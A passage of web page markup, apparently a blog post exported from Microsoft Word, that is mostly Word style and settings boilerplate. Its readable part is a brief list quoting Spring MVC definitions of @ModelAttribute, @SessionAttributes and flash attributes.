<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
</div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">1)
@ModelAttribute on a method argument</span></div>
<div class="MsoNormal">
<i><span lang="EN-US" style="mso-ansi-language: EN-US;">"An
@ModelAttribute on a method argument indicates the argument should be retrieved
from the model..."</span></i></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">2)
@ModelAttribute on a method</span></div>
<div class="MsoNormal">
<i><span lang="EN-US" style="mso-ansi-language: EN-US;">"An
@ModelAttribute on a method indicates the purpose of that method is to add one
or more model attributes. @ModelAttribute methods in a controller are invoked
before @RequestMapping methods"</span></i></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">3)
@SessionAttribute for controller</span></div>
<div class="MsoNormal">
<i><span lang="EN-US" style="mso-ansi-language: EN-US;">"The
type-level @SessionAttributes annotation declares session attributes used by a
specific handler. This will typically list the names of model attributes or
types of model attributes which should be transparently stored in the
session"</span></i></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">4)
FlashAttribute</span></div>
<div class="MsoNormal">
<i><span lang="EN-US" style="mso-ansi-language: EN-US;">"Flash
attributes provide a way for one request to store attributes intended for use
in another."</span></i></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
